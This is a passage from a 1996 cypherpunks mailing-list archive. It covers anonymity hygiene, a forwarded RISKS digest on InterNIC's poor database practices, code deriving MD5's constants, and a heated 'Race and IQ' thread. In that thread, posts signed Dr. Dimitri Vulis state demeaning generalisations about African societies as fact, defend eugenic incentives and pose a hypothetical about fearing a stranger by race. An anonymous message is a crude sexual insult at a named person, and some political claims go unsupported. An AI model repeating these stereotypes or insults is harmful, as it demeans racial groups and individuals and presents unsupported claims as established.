it would have been the best course of action.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott V. McGuire" <svmcguir@syr.edu>
Date: Fri, 13 Dec 1996 23:11:21 -0800 (PST)
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: your mail
In-Reply-To: <199612132143.PAA19967@manifold.algebra.com>
Message-ID: <Pine.LNX.3.95.961214020647.909C-100000@homebox>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Dec 1996, Igor Chudov @ home wrote:

> Huge Cajones Remailer wrote:

... snip ...

> > --
> > Greg Broiles                | US crypto export control policy in a nutshell:
> > gbroiles@netbox.com         | 
> > http://www.io.com/~gbroiles | Export jobs, not crypto.
> >                             | 
> > 
> 
> :-(
> 
> Does anyone have any suggestions (checklists of things to do, etc.) 
> for people who are afraid of accidentally disclosing their anonymous 
> identities? It seems to be a common problem that anonymity is violated
> because people simply screw up with their remailing software.
> 
> 
> 	- Igor.
> 

If possible, I suggest using a multi-user operating system (link linux
etc.) and setting up an account specifically for an anonymous user/nym.
Don't use the account for any non nym stuff.  This way, for example, there
won't be a signature file with a real name that might get accidently
appended to an email.

--------------------
Scott V. McGuire <svmcguir@syr.edu>
PGP key available at http://web.syr.edu/~svmcguir
Key fingerprint = 86 B1 10 3F 4E 48 75 0E  96 9B 1E 52 8B B1 26 05






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 13 Dec 1996 23:34:04 -0800 (PST)
To: ichudov@algebra.com
Subject: Re: Race and IQ
Message-ID: <01ICZFVCL2QMAEL9I4@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"ichudov@algebra.com" 14-DEC-1996 02:25:51.19

>From: TCMay:
>> (For the curious, I am persuaded that there are minimal differences in
>> "intelligence" between the several or many races, but that cultural and
>> sociological factors strongly affect upbringing, learning, interest in
>> doing well in school, ability on standardized tests, success in business
>> matters, and so on.)

	It would appear that many of these factors that you mention are
correlated together, based on that performance on IQ (and even
more background-dependent standardized tests such as the SAT) is
highly correlated with academic and business success.

>A good point. I personally think that whatever we find -- whether there
>are genetic differences or not -- is not terribly important since one
>can make the most money by judging individual people by their merit.

	Agreed on both counts. The differences (whatever origin they
have) detected by standardized tests between group averages are vastly
outweighed by individual differences.

>It is an interesting academic question, but for a businessman (absent
>anti-discrimination laws) it is not very relevant.

	Quite. Unfortunately, the anti-discrimination laws make it hard
to make use of all available data. I am not contending that
businessmen should only use IQ tests... but that in almost all cases
they are important as one data point that is not very expensive to
gather. (For cases in which the free market is not operative (e.g.,
governments and monopolies), they have the additional advantage of
not seeing the color of the person's skin or other information on
which, for instance, an interviewer may be biased. The free market
can take care of keeping businesses making rational decisions;
non-market organizations are another matter.)
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 14 Dec 1996 00:02:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: RRE: The InterNIC: a case study in bad database management
Message-ID: <01ICZGWBSDU2AEL9I4@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I've dropped a note to Jonathan Kamens pointing out that
InterNIC is a monopoly, and therefore has no real reason to
keep up any databases that don't directly generate money.
	-Allen

From:	IN%"rre@weber.ucsd.edu" 14-DEC-1996 02:53:56.61

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Fri, 13 Dec 1996 16:44:21 -0800 (PST)
From: risks@csl.sri.com
Subject: RISKS DIGEST 18.67

RISKS-LIST: Risks-Forum Digest  Friday 13 December 1996  Volume 18 : Issue 67

----------------------------------------------------------------------

Date: Thu, 12 Dec 1996 17:07:04 -0500
From: "Jonathan I. Kamens" <jik@cam.ov.com>
Subject: The InterNIC: a case study in bad database management

(This message was also sent to comp.protocols.dns.ops .)

The InterNIC (http://www.internic.net) is responsible for Internet domain
name service for all top-level domains, as well as for second-level domains
underneath all the old ARPA domains except MIL (EDU, GOV, NET, ORG, COM).
Until a few years ago, domain registration services were provided by the
InterNIC for free.  That changed when they convinced the NSF that its grant
money wasn't enough to cover their costs, so (amid much hubbub on the Net)
they started charging $50 per year for any second-level domain registration,
with the first two years (i.e., $100) payable in advance.

According to <http://rs.internic.net/nic-support/nicnews/stats.html>, the
InterNIC registered 638,788 new domains between August 1993 and September
1996.  If I'm doing my math right, at $100 per domain, that's almost $64
million, or over $20 million per year.  I would think that with that much
money, they'd be able to provide competent service to their customers.
Unfortunately, my experience has been that they're simply not doing an
acceptable job.  Some examples:

*****

* Their automated systems do not function properly.

  They've introduced a PGP-based system for authentication of domain
contacts.  In other words, they allow domain contacts to register
their PGP public keys in the InterNIC public-key database, and then
requests which come from those contacts will only be accepted as
authentic if they are signed with the corresponding provide key.

  Unfortunately, this system does not always work.  Recently, I
submitted a series of twelve database modification requests to the
InterNIC in a single day.  All of them were correctly signed with my
PGP key.  Of the twelve requests, three were returned to me in
messages beginning, "We are not able to verify the PGP signed message
that you sent us."

  To make matters worse, for one of those three failed requests, I received
a message claiming the the modifications I'd requested had been completed,
two days *before* I received the message informing me that they were unable
to verify my PGP signature.

  I have asked the InterNIC multiple times why their system randomly fails
to verify valid PGP signatures.  They have not responded to my inquiries.

  Interestingly enough, another poster to comp.protocols.dns.ops claimed
that when he asked an InterNIC on the telephone about their PGP
authentication system, he was told that it is not currently working.  That
would seem to indicate that the InterNIC is aware that there are problems
with it, and yet they continue to advertise it on their Web site without any
indication that it might not work for any given request.

* There are some data in the database which are impossible to update using
the templates they provide.

  One of the types of data stored in the InterNIC database is hosts; in
particular, hosts which act as domain-name servers for domains registered
with the InterNIC have records in the database.

  Host records include an organization name and address associated with the
host.  And yet, the template for updating host records (available at
<ftp://rs.internic.net/templates/host-template.txt>) does not have fields in
it for updating that information!  I believe that there are a couple of
other record types in the database which have this same problem.

  This organization/address data has been described to me by an InterNIC
employee as an "old hold-over;" it seems that new host records do not have
organization and address data, but old ones do.  Nevertheless, one would
think that when switching to a new format for host records, the InterNIC
would have either removed the obsolete data from the old records or
established a procedure for updating it.

  Instead, the only way to update this information electronically is to send
a plain-text message to hostmaster@internic.net explaining what you're
trying to do, and then hope that whoever reads your message will be
competent enough to understand what you're asking for and do the update by
hand.  Which brings me to my next point...

* When asked how to do something that is not handled automatically by their
templates, their staff give incorrect answers (or simply ignore the query)
more often than they give correct answers.

  Of the twelve requests mentioned above, six of them were handled
improperly by the InterNIC staff members who processed them.  Iwn several
cases, I received a response instructing me to use a particular template to
make the changes I had requested, when in fact those changes had nothing
whatsoever to do with the template they told me to use.

  I finally had to escalate my requests by sending "out-of-band" E-mail to
an InterNIC employee who has resolved problems of this sort for me in the
past, and she was able to "bounce" my requests to a high enough level that
they actually got processed.

  Incidentally, the InterNIC introduced one or more typographical errors
into the data I sent them when processing six of my twelve requests (i.e.,
when they were done processing my requests, six of the twelve records I
asked them to modify had one or more typographical errors in them).

  I suppose that sending incorrect answers is better than how things were a
few months ago -- then, if you sent a request that the person who read your
message did not know how to answer, he/she simply ignored it and sent no
response whatsoever.

* There are some data in their database which are impossible to update using
their current procedures.

  Imagine this scenario... Joe Admin at Foo, Inc. is responsible for system
administration, including DNS administration.  He therefore has a contact
record in the InterNIC database indicating that he works for Foo, Inc., and
he is listed as a contact for various domain, network, and host records, in
the InterNIC database.

  Now, he leaves the company and takes a new job, with no further contact
with Foo, Inc.  He doesn't bother to update his contact record in the
InterNIC database before he leaves.

  Foo, Inc. would rather not let records remain in the InterNIC database
claiming that Joe works for them when in fact he does not.  Therefore, they
want to contact the InterNIC and tell them, "Look, the information in Joe
Admin's contact record which says that he for us is incorrect.  You can
confirm this by attempting to send E-mail to the address in the record, or
by calling the phone number in the record and asking to speak to him.  The
person who answers will confirm that he no longer works there.  Please
either delete the contact record completely or remove the information in it
which associates Joe Admin with Foo, Inc."

  Sounds reasonable, right?  Well, unfortunately, the InterNIC has *no
procedures whatsoever* for allowing a company to remove contact information
which incorrectly lists them.

  I attempted to do just what I described, i.e., to get the InterNIC to
remove the contact record for a former employee of OpenVision who no longer
works here, and who I cannot contact to ask him to update his own record
(and considering that it's not hurting him in any way, I don't see that he'd
have any incentive to update it even if I could ask him to).

  After several rounds of E-mail with the InterNIC, they called me on the
telephone to discuss what I was trying to do.  Once on the phone with them,
I was "bounced up" through several layers of InterNIC staff, until I was
finally able to speak to a woman who was perfectly willing to admit that
yes, the scenario I described was a somewhat common one, and yes, it was
perfectly reasonable for a company not to want the InterNIC database to
associate non-employees with the company, but no, there's no way for anyone
but the owner of a contact handle to update it.  "Perhaps we need to
establish a procedure for that, and I'll be glad to discuss that for you
with our customer service manager, but we don't have one right now," she
said, and she did not offer to make an exception and handle my particular
request manually without the blessing of a "procedure".

  Presumably, this means that I could edit my own contact handle to
indicate that I work for any company that I want, and that company
would have no way to get the InterNIC to remove the fraudulent
information.

  Similarly, presumably, that means that (to be a little morbid for a
moment), if someone listed in the InterNIC database dies, there's no way for
anyone else to get the InterNIC to remove the deceased's record from the
database.

  When I pressed the woman about this, she said to me, "If you're a network
administrator at this company, you presumably have control over the mail
server" (an assumption which is not always true, and indeed isn't true in
this case; although I can ask the people who administer the mail server to
make changes and hope that they'll listen, I don't have the ability to make
the changes directly).  "Well," she continued," if you send us a mail
message which claims to be from the former employee, asking for his record
to be deleted, we'll process it."

  "Let me get this straight," I responded.  "You're telling me that I should
forge E-mail to your system in order to delete this record."  She confirmed
that interpretation.  I said, "Surely you see the absurdity of that."

  She responded, "Well, obviously, ideally we wouldn't want anyone forging
requests to our system, but in this case, that's the only way for you to
delete the record."

  "What if the former employee had associated a PGP key with his contact
record before he left the company."

  "Well, in that case, you'd need his private PGP key in order to delete the
record."

  "But surely you know that's impossible -- the whole point of PGP is that
only the owner a private key has access to it.  Even if I had access to the
file in which it was stored, I wouldn't know the correct password to unlock
it."

  "Well, in that case, there would be no way for you to delete the record."

*****

There are a number of countries with strict laws about the collection of
private information in computerized databases.  Database maintainers are
required to seek permission from all individuals who have data about them
stored in the database, to guarantee the security of the database, and to
establish working procedures for keeping the data in the databases
up-to-date.

The United States has few such laws (there are laws about specific types of
databases, such as credit and medical records, but no laws about databases
in general).  Until I started dealing with the InterNIC, I didn't see much
point to them.  Well, I've changed my mind.  the InterNIC proves rather
clearly that left to their own devices, companies will not maintain
databases in a responsible manner.

Incidentally, nowhere on the InterNIC's WWW site can I find the address or
telephone number of the governmental office which oversees their grant and
handles complaints about their services.  Several months ago, I sent them
E-mail asking for them so that I could file a complaint, to be considered
the next time their grant comes up for renewal.  Like many of my other
messages to them, that request was ignored.

Jonathan Kamens  |  OpenVision Technologies, Inc.  |   jik@cam.ov.com

------------------------------

End of RISKS-FORUM Digest 18.67 
************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 14 Dec 1996 09:21:03 -0800 (PST)
To: Huge Cajones Remailer <nobody@huge.cajones.com>
Subject: Re: Appropriate Topics for Cypherpunks
In-Reply-To: <199612132256.OAA19882@mailmasher.com>
Message-ID: <32B2E17E.504@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Huge Cajones Remailer wrote:
> At 9:54 AM 12/13/1996, Rob Carlson wrote:[snip]
> We are talking about trust models.
> The reason that the Net is a fundamental threat to the established
> social order is that it will probably result in a worldwide change in
> trust models.  For one thing, we are now learning just how venal and
> corrupt the world leadership really is.  At the same time,
> cross-border relationships and trust are flourishing.
> The rise of anonymous identities raises the question of how we can
> "trust" somebody we have never met.  This immediately leads to the
> question of why we trust other people we haven't met, such as the
> President, or scientists, or whomever.  It turns out our reasons for
> "trusting" these people are not as solid as some of us once believed.

I'd like to take a chance on showing my ignorance, but, if I do learn
to trust an anonymous source on something-or-other, and then a forger
comes along and disrupts that, i.e., I can no longer tell in all cases
which is the old source and which is the bogus, that's a problem.

I think I could learn to trust any number of anon's, but will the future
technology be able to guarantee ID's as well as, say, looking at someone's
face whom I know, or talking to them on the phone?

[snip]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 14 Dec 1996 09:28:20 -0800 (PST)
To: Huge Cajones Remailer <nobody@huge.cajones.com>
Subject: Re: Race and IQ
In-Reply-To: <199612140643.WAA32553@mailmasher.com>
Message-ID: <32B2E339.5FE0@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Huge Cajones Remailer wrote:
> At 8:30 PM 12/13/1996, Timothy C. May wrote:[snip]
> Now for some entertainment.
> Oliver Wendell Holmes, when he was a judge in Virginia, ordered the
> forcible sterilization of several young women.  The state would wait
> until they became ill and then when they were admitted to a hospital,
> they were sterilized under the guise of giving them some other
> operation.
> Holmes claimed that the grandmothers of the women were imbeciles,
> their mothers were imbeciles, and that they were imbeciles.  His great
> line was "Three generations of imbeciles are enough!"
> Curiously, it turns out that the word "imbecile" was a euphemism for
> "illegitimate".

I have heard that in 1800's England, there were cases of children starving
to death (even on farms) where the euphemism applied was something like
"apoplexy" or whatever, to suggest a disease rather than neglect.  But we
have some goodies here in the late 20th century too, yes?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 14 Dec 1996 08:42:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Race and IQ
In-Reply-To: <199612140643.WAA32553@mailmasher.com>
Message-ID: <P4kXyD184w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@huge.cajones.com (Huge Cajones Remailer) writes:
>                               there are people who can do things like
> play a drum with the left hand to 13 beats a measure and do something
> like 17 beats a measure with the right hand.  Those who aren't amazed
> by this should try doing three beats on the left hand with two on the
> right.  Call me when you master it.  ;-)
>
> If you lived in a society where this skill was considered an important
> component of social success, most of us would appear to be retarded.

Music is not considered important to economic suceesee in the West, so most
kids with a talent for it never get to develop it (or never even get
"discovered"). But "not being in the top basis point of the population"
!= "being retarded".

Is this trait inherited?

Does this trait enable the person who has it to accumulate more wordly goods
and to have more children? I suspect that it does in certain societies.

A drummer this good would probably be very successful economically in
contemporary Western society, while in his native village his skill is
wasted.

It's funny how Red's been conditioned to ignore the much more obvious
disparity in athletic skills. "White man can't jump."

> (Consider, for example, the ancient Chinese civilization.  Appointment
> into the imperial bureaucracy occured only after the applicants passed
> elaborate tests regarding their knowledge and interpretation of
> poetry.  That was the entire qualification.)

Again, the racist American doesn't know much about the elaborate Chinese
civil service exams, and dismisses them as "interpetation of poetry".

Crypto-relevant remark: the exams were anonymous. The candidate submitted
the exam paper under a motto (?). The graders were not supposed to know
the identity of the candidate.

> Many of the readers of this list are anarchistically inclined.  When
> we hear that African societies have tended to be anarchistic, we
> should applaud their wisdom and insight.  Perhaps these people could
> teach the rest of us a few things.

Most primitive societies (not only in Africa) tend to be (effectively)
fascist dictatorship, where the chief's word is the law, enforced by his
family members and leutenants. The chief would use this power to rob the
villages of the products of their labor, to rape their women, etc, and would
pass on this power to his son. The priests also had the power to rob the
villages (they don't work, but they've got to eat). The shamans could
declare a person a "witch"/heretic and have him/her killed.

Remember, whites *bought* almost all the slaves that were brought from
Africa to the New World. They didn't bring slavery to Africa. Western
civilization is the only one I know that voluntarily aboloshed slavery.

> few things.  Is there a history of welfare states in Africa, or did
> they practice voluntary anarchistic communal charity on the level of
> villages?)

Typically, there were slaves, and even the free villagers had the products
of their labor expropriated to feed the vast bureaucracy of chiefs and
priests. Also the women were treated pretty shabbily.

> (Incidentally, I question the claim that African societies never
> developed cities and bureacracies.  The Egyptians are the most
> prominent example.  Mathematically adept and literate they prospered
> for a couple thousand years.  A better run than the Romans managed!

Wrong. Egyptians' math was pretty much non-existent, compared even with
their contemporary sumerians' math. You can't get very far with "Egyptian
fractions". I guess Red's been going to a public school where the curriculum
writers tried to raise the self-confidence of minority kids by teaching them
how Egyptians invented the math that the Greeks stole from them. Sorry, your
teachers have been lying to you.

Egyptian civilization stopped developing the moment they created the strong
government based on deification of the pharaoh. There was not a single
invention, no development at all for thousands of years. Horses were
introduced by Asian conquerors. The writing system got simpler. Otherwise,
there was very little new at the time of Alexander the Great as compared to
the first pyramids. An amazingly boring history.

> We tend to think of Egyptians as being sort of like Europeans.  I
> believe this is because Europeans invented Egyptology.  Excuse me for
> pointing out the obvious, but Egypt is in Africa.  What is more, if
> you study Egyptian statuary, you will find many examples of distinctly
> African looking royalty.  Also, I know that cities like Timbuktoo were

Why do some people look at the lip thickness of the statues? There are
thousands of mummies to analyze. There are modern copts, the descendants of
the ancient egyptians. The results of their DNA analysis didn't satisfy
Red's teachers, so now they measure how thick the statues' lips are.

By the way, Ethiopians and Somalians are genetically closer to Arabs and
Jews than to African Americans.

> centers of Muslim learning and were large enough to have streets and
> houses.  We may know little about them because Europeans were not
> allowed to visit, and also for racist reasons.)

Timbuktu had a "medrese" (a place where young people memorized verses from
the Quran). There are hundreds of such medredes north of Sakhara, in Middle
East, Central Asia, etc. Every Moslem town had at least one. Timbuktu was
remarkable being was the only one serving the entire subsakharan region.

> Scientific questions aside, it isn't clear why the racial link to
> intelligence matters.  What are we going to do differently if it turns
> out that, on average, for genetic reasons, Albanians are less quick on
> the uptake than other people?

NOTHING. The individuals' dispersion from the average is so much greater
that whatever difference could possibly exist between group adverages that
it predicts nothing for individuals once any selection critera are invoked.

Consider a basketball team whose coach refuses to accept white players
because he believes that "white men can't jump". He'll miss on some
excellent white players who will join the competing teams. If this team's
objective is to win, then racial discriminations puts it at competetive
disadvange.

An h.r. person whose task is to hire a C programmer, and who refuses even to
interview black candidates because he believes that an average black
candidate is dumber than an average white candidate is likewise guilty of
economic fallacy (and also various crimes in the U.S.)

Even if it were true that the ancient Egyptians were genetically related to
subsakharans, and even if they had invented all the math that we attribute
to the various "Greek" mathematicians, what would that have to do to the
self-esteem of today's African-Americans?

> The link between intelligence and success is not at all clear.  We
> generally consider mathematicians and computer programmers to be
> smart, but in terms of total life competence, large numbers of these
> people live less than ideally.

Do you have any verifiable statistics to support this claim?

> The eugenicists propose murder.  This doesn't make any sense at all.

Now, you're lying. Certain people advocate economic insentives (paying the
people believed to carry undesirable genes not to breed), sterilization
(again, voluntary, in exchange for economic insentives) and better education
(e.g. pregnant women over certain age are strongly encouraged to find out
whether the fetus has Down's syndrome and several other common
abnormalities; it's up to them to choose to abort).

> Oliver Wendell Holmes, when he was a judge in Virginia, ordered the
> forcible sterilization of several young women.  The state would wait
> until they became ill and then when they were admitted to a hospital,
> they were sterilized under the guise of giving them some other
> operation.
>
> Holmes claimed that the grandmothers of the women were imbeciles,
> their mothers were imbeciles, and that they were imbeciles.  His great
> line was "Three generations of imbeciles are enough!"
>
> Curiously, it turns out that the word "imbecile" was a euphemism for
> "illegitimate".

I think you're referring to the 1927 _Buck v. Bell_ decision, where the
Supreme Court upheld the Virginia law that mandated forced sterilization of
imbeciles. Justice Oliver Wendell Holmes wrote the decision, which said:
"three genereations of <Red Rackhams> is enough". That was 6 years before
Hitler won the elections in Germany.

What evidence do you have that Justice Oliver Wendell Holmes a) was holding
a second job in Virginia, b) had anything to do with the implementation of
the law, c) that the young lady was not an imbecile?

> Red Rackham

Indeed, a typical "cypher punk".

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 14 Dec 1996 09:56:44 -0800 (PST)
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: [No joke] The Feds may legally gas us
In-Reply-To: <Pine.LNX.3.95.961214151929.5039A-100000@random.sp.org>
Message-ID: <32B2E9A0.4592@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


The Deviant wrote:
> On Fri, 13 Dec 1996, Lucky Green wrote:
> > Folks,
> > Did you know that the Feds may legally test chemical and biological weapons
> > on the civilian population as long as they give 30 days advance notice to
> > the local bigwigs (so they can get themselves and their families out of the
> > danger zone)?
> > This is not a joke. It is in the United States Code.

> No, they can't.  Development, testing, and use of Biological weapons is
> banned by the Geneva conventions (among others).  International treaty
> outweighs USC.

They can't, but they do. The gas used at Waco was banned internationally,
but Janet Reno justified it, and she just got rehired.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Sat, 14 Dec 1996 08:15:24 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Redlining
Message-ID: <3.0.32.19961214101509.00690b1c@execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09:32 AM 12/12/96 -0800, Dale Thorn wrote:
>Matthew J. Miszewski wrote:
>> >(Those who don't believe me should get "Love Supreme" by John Coltrane
>> >and listen to it carefully about 20 times.  There are layers and

Just for the record, I didn't say this.  I believe it was Red.  The thread
has become so convoluted that I am only sure it wasnt me. ;-)

Matt
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMrLSibpijqL8wiT1AQHEoQP/f+G82ePBn6dlm7jgiaYZTalSm2xMAYEd
S/wExEh86p0knbt4+fMmREQGR7PXyNJPyDknqSEkmyTh38QfwBwsuF20zEiUM4I2
gXR8e2zeuW1kB1L51PacusxSoAqR7FqIb2euwTlZ+K3GnZVpFPZmdZn03GaTGsvC
yVfTehKEE2w=
=QcKO
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 14 Dec 1996 08:40:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Race and IQ
In-Reply-To: <19961214054348.15808.qmail@suburbia.net>
Message-ID: <o9oXyD185w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


proff@suburbia.net writes:
> Just as there are differences in physical attributes between races,
> so to are there are differences in the brain between races, and even
> for genetic enclaves within races (and sexes which genetically,
> contain greater differences than between races).  However, it has
> been my experience that individual differences exceed racial
> differences making the whole race vs. anything discussion a waste of time.
> i.e people should be judged as individuals not as members of one
> race or another, because that is where the most useful discrimination
> lays.

That's a very good point, Julian, but sometimes the circumstances force us to
used "appled epistemology" in less than the ideal conditions, or sometimes
we just make up cutesy hypotheticals, complete with ASCII art:

1. Suppose that you have to consider two individuals, Al and Bob, and all
you're allowed to know is that Al is white and Bob is black. You must make a
bet as to a) which one is smarter, b) which one is physically stronger. You
can't learn any additional information about them other than the color of their
skin. How do you bet?

2. Suppose that you're walking in the middle of a deserted street in the
    TRUCK      middle of the night in an industrial neighborhood. You see a
S    \ /    S  truck coming from the other side. You also notice that there
i     S     i  are only two people around, standing on the opposite
d     t     d  sidewalks. You'll have to pass close to one of the two
e P1  r  P2 e  people to avoid being hit by the truck. P1 and P2 look the
w     e     w  same, moderately menacing, are dressed the same, have no
a     e     a  obivious business standing here in the middle of the night,
l     t     l  but P1 is white and P2 is black. Are you going to step right
k    / \    k  or left to yield to the truck? (Disregard the reasonable
     YOU       assumption that P1 and P2 are working together. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Sat, 14 Dec 1996 10:29:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Firewalls
Message-ID: <199612141829.LAA08918@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


The only `culture' Timothy May possesses is that cultivated from his 
foreskin scrapings.

       )_(
      [@ @] Timothy May
      |/ \|
       \O/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Norman Hardy <norm@netcom.com>
Date: Sat, 14 Dec 1996 12:32:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Magic Numbers in MD5
In-Reply-To: <v02140b01aed7e51544ac@[192.0.2.1]>
Message-ID: <v03007800aed8afa18c27@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 9:15 PM -0800 12/13/96, Peter Hendrickson wrote:
>I am curious where some of the magic numbers in MD5 originated.
>
>First, we have the four chaining variables, A, B, C, and D which
>are initialized with apparently random numbers.  Are they as
>random as they look, or are they carefully chosen?
>
>Second, we have the t_i values.  Schneier's first edition says this:
>
>"In step i, t_i is the integer part of 4294967296xabs(sin(i)), when
>i is in radians.  (Note that 4294967296 is 2^32.)"
>
>Does abs(sin()) have some properties that are especially conducive to
>strengthening MD5 or is it just a function to generate mildly random
>numbers?  If the latter, wouldn't the algorithm be stronger if it was
>used with completely random numbers?
>
>Peter Hendrickson
>ph@netcom.com

Perhaps random numbers would be stronger but they would not be manifestly
random.
MD5's formula for t_i precludes the possibility that the definer of MD5
chose the numbers
accoriding to some undisclosed principles that would allow him a trap door.

The following code computes the magic numbers without requiring trig functions:

static word si[64];
static int md5init()
{double c1=0.5403023058681397, s1 = 0.8414709848078965;
int j; double a=1, b=0;
for(j=0; j<64; ++j)
 {double p = a*c1 - b*s1, q = a*s1 + b*c1;
  a=p; b=q;
  {union{double d; struct{int high; int low;} fx;} z;
   z.d=(fabs(b)-1.1e-10)+1048576;
   si[j] = z.fx.low;
 }}}

An alternative would have been to let t_i be MD4(i) or SHA(i).

Using SHA to define MD5 would have required collusion between Rivest
and NSA to allow for a trap door. Even then it would have been very difficult.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 14 Dec 1996 10:24:58 -0800 (PST)
To: ark@paranoid.convey.ru (ArkanoiD)
Subject: Re: your mail
In-Reply-To: <199612141608.TAA03589@paranoid.convey.ru>
Message-ID: <199612141744.LAA01193@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


ArkanoiD wrote:
> 
> nuqneH,
> 
> > 
> > 
> > Hey.. is there any CoderPunks Meetings somewhere in russia?
> > 
> > 
> Michael Bravo tried to organize 2600 meetings in SPb and failed. (afaik)
> 

Why?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 14 Dec 1996 10:46:42 -0800 (PST)
To: devnull@manifold.algebra.com
Subject: Re: Race and IQ
In-Reply-To: <o9oXyD185w165w@bwalk.dm.com>
Message-ID: <199612141843.MAA01741@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dr.Dimitri Vulis KOTM wrote:
> proff@suburbia.net writes:
> > Just as there are differences in physical attributes between races,
> > so to are there are differences in the brain between races, and even
> > for genetic enclaves within races (and sexes which genetically,
> > contain greater differences than between races).  However, it has
> > been my experience that individual differences exceed racial
> > differences making the whole race vs. anything discussion a waste of time.
> > i.e people should be judged as individuals not as members of one
> > race or another, because that is where the most useful discrimination
> > lays.
> 
> That's a very good point, Julian, but sometimes the circumstances force us to
> used "appled epistemology" in less than the ideal conditions, or sometimes
> we just make up cutesy hypotheticals, complete with ASCII art:
> 
> 1. Suppose that you have to consider two individuals, Al and Bob, and all
> you're allowed to know is that Al is white and Bob is black. You must make a
> bet as to a) which one is smarter, b) which one is physically stronger. You
> can't learn any additional information about them other than the color of their
> skin. How do you bet?

This is an unrealistic problem and a stupid situation.

> 2. Suppose that you're walking in the middle of a deserted street in the
>     TRUCK      middle of the night in an industrial neighborhood. You see a
> S    \ /    S  truck coming from the other side. You also notice that there
> i     S     i  are only two people around, standing on the opposite
> d     t     d  sidewalks. You'll have to pass close to one of the two
> e P1  r  P2 e  people to avoid being hit by the truck. P1 and P2 look the
> w     e     w  same, moderately menacing, are dressed the same, have no
> a     e     a  obivious business standing here in the middle of the night,
> l     t     l  but P1 is white and P2 is black. Are you going to step right
> k    / \    k  or left to yield to the truck? (Disregard the reasonable
>      YOU       assumption that P1 and P2 are working together. :-)

It was my experience that if I go by a scary-looking group of black 
people, look into their eyes without fear and say "hi" and go further, 
they would never exhibit any sign of aggressiveness. They even get 
surprised.

This always worked for me in Russia, whenever I had to pass a group
of mobsters. I think that internal motivation for aggressive people
has something to do with sexual hormones and the need to subdue their
victims, so nothing attracts them more than exhibition of fear. I would
definitely think it is safer to actually go to the right, even if you
assume that P2 has some sinister thoughts.

Then again, personal experiences are not a good replacement for 
statistics. 

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sat, 14 Dec 1996 11:07:09 -0800 (PST)
To: Adam Shostack <adam@homeport.org>
Subject: Re: ITARs effects
In-Reply-To: <199612131507.KAA27336@homeport.org>
Message-ID: <199612141904.OAA07254@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain



: This implies that putting something up for FTP == export. Holy
: shit.

That has always been the position of the Department of Defense Trade
